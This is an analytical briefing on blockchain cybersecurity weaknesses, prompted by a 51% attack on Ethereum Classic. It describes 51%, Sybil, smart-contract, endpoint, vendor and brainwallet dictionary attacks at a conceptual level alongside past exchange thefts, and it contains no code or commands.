Blockchain’s cybersecurity needs greater attention
Cybersecurity attacks against cryptocurrencies raise tough questions for the underlying blockchain technology
Coinbase, a major US-based cryptocurrency exchange, today temporarily halted trading of its token Ethereum Classic following a cybersecurity attack on its underlying blockchain. The attack once again cast doubt over the potential of blockchain, a leading form of distributed ledger technology, to revolutionise industry.
What next
Blockchain technology is secure by design, making it superior to most alternative ledger technologies. However, like all technology, it has important cybersecurity vulnerabilities, which are repeatedly exploited by criminals to steal cryptocurrency. The industry’s understanding of these vulnerabilities, and possible mitigating strategies, is growing, but more slowly than the application of blockchain in sensitive areas such as voting.
Subsidiary Impacts
- Cybersecurity attacks against cryptocurrency exchanges fuel investor scepticism about digital tokens, already seen as speculative bubbles.
- International standards for blockchain developers will have limited impact on security as these standards are not legally mandatory.
- Energy intensity of blockchain is its greatest weakness.
Analysis
Since blockchain makes it much faster and cheaper to process transactions, the technology is being adopted widely (see CHINA: Firms expect bright future for blockchain - August 9, 2018 and see INTERNATIONAL: Blockchain will aid energy efficiencies - July 9, 2018):
- PwC's 2018 Global Blockchain Survey showed 84% of the executives it surveyed are "actively involved" in adopting blockchain.
- Companies such as FedEx are using blockchain for supply chain management while several food companies including Nestle, Unilever and Walmart have partnered with IBM to create a blockchain to monitor food safety.
- DeBeers is using the platform to ensure the traceability of diamonds.
Over coming years, growing use of smart contracts could transform record-keeping and transactions in areas ranging from medical records to land registries.
Key types of attacks
Blockchain technology has multiple cybersecurity vulnerabilities.
51% attacks
Cybercriminals able to acquire more computing power than that of all the honest miners in the chain combined (ie, 51% of the computing power) can reverse transactions and create false second blockchains, enabling them to double-spend tokens.
In May 2018, hackers used a 51% attack to steal 18 million dollars from Bitcoin Gold. Other cryptocurrencies such as Verge, Monacoin, Zencash and Litecoin all experienced attacks that same month, and Electronium was hacked in April last year.
Today's Coinbase attack is believed to be a 51% attack.
Payments network Dash claims to be working on a blockchain which would be resistant to such attacks.
Sybil attack
A 'Sybil attack' involves a single malicious actor creating multiple online identities. If the network accepts these identities, the malicious actor can control a large number of nodes on the network without alerting other miners, gaining the power to falsify transactions and commit other types of fraud.
For example, China-based cryptocurrency exchange FCoin launched a Sybil attack on the Ethereum network in July last year.
Implementation vulnerabilities
Other vulnerabilities are not on the blockchain itself but on the applications built on top of it, as these applications are only as secure as the underlying code.
The DAO hack
In June 2016, hackers stole 50 million dollars of Ether cryptocurrency from 'The DAO', an application built on the Ethereum blockchain which makes use of a smart contract to enable decentralised and automated investment decisions.
The hackers exploited vulnerabilities in its underlying code, collecting the same Ether token multiple times in a single transaction because the account balance did not update quickly enough.
Endpoint vulnerabilities
Endpoint vulnerabilities exist on devices individuals use to access the blockchain. If there are security weaknesses at the endpoints -- for example, in the operating systems such as Windows and Android used on computers and mobile phones -- data can be exposed in the process of attempting to access the blockchain.
In December 2017, hackers stole 78 million dollars worth of bitcoin from the cryptocurrency marketplace NiceHash by hacking into an employee's computer, which then enabled them to gain access to the company's systems and drain the bitcoin from company accounts.
Vendor risks
Ensuring safety throughout the technological supply chain is critical
Many third-party vendors are producing blockchain-based technologies, which can be a source of vulnerability if they do not follow secure practices.
Risks arise if the code created by vendors is flawed, if their own internal systems are unsecure, or if there are malicious insiders within the company.
Blockchain vendors have access to large amounts of client information, which regularly needs to be moved into and out of the blockchain. They also have a client's blockchain login credentials. A vendor breach could therefore result in a compromise of client information. This makes supply chain cybersecurity essential.
For example, April 2016, the cryptocurrency exchange ShapeShift saw 130,000 dollars in Bitcoin stolen from the company's hotwallet by a company insider, who later sold access information to another hacker who carried out another attack against the company.
Encryption vulnerabilities and user behaviour
Vulnerabilities in the underlying encryption are another challenge.
One issue is hash collisions. Hashing is a cryptographic technique applied to each transaction on the blockchain. Collisions occur when two different input strings into a hash function inadvertently produce the same hash.
Since the input length of a hashing function can be any number of characters but the output length is much shorter with a pre-defined number of characters, the risk of hash collisions is unavoidable.
If an individual is able to generate someone else's private key, they could access and steal funds from their cryptocurrency wallet.
Moreover, multiple people could unintentionally generate the same private key, especially if encryption keys are not created properly.
User behaviour is a major challenge in this regard: some people create their private keys by using a brainwallet, software which generates the person's private key by taking a seed phrase that the person has devised and then hashing it.
In what is known as a 'dictionary attack', an attacker cracks passwords generated with a brainwallet by taking commonly used passwords or passphrases and generating their hash values, and then trying to see if any of those are the private keys to an account.
In 2014, hackers stole 450 million dollars worth of bitcoins from Mt. Gox, a Japanese bitcoin exchange that handled over 70% of all domestic bitcoin transactions. The bitcoins were stolen from Mt. Gox's hacked hot wallet, which are online wallets used to store private keys.
Quantum computing risks
Although still far from fully developed, quantum computers would be able to breach blockchain security with their unprecedented computing power (see INT: Quantum computing revolution is far off - July 23, 2018). Research into quantum blockchains is in early stages.
Outlook
International standards for blockchain may emerge in 2021
Awareness of the cybersecurity vulnerabilities of blockchain has only recently started to gain traction:
- The International Organization for Standardization is reportedly planning to release standards for blockchain developers by 2021.
- Prominent technology firms such as McAfee are beginning to track security problems with this technology.
Even so, the nature of the cyber products industry is unlikely to change, where most developers release minimum viable products without extended testing, and the ecosystem is dominated by less well resourced smaller firms and start-ups, especially in such lucrative areas as cryptocurrencies.
Controversial applications
Despite these unresolved issues, some governments are looking to use blockchain for voting, including some US states, South Korea and Thailand. The US state of West Virginia allowed it for the first time in US midterm elections in November 2018.
The belief is that this will be more secure and transparent than online voting (already introduced by Estonia). However, this may not be the case; sophisticated hackers (especially foreign state-backed ones) could engage in large-scale voting fraud. Yet, underestimating the risks, some governments may adopt the technology regardless.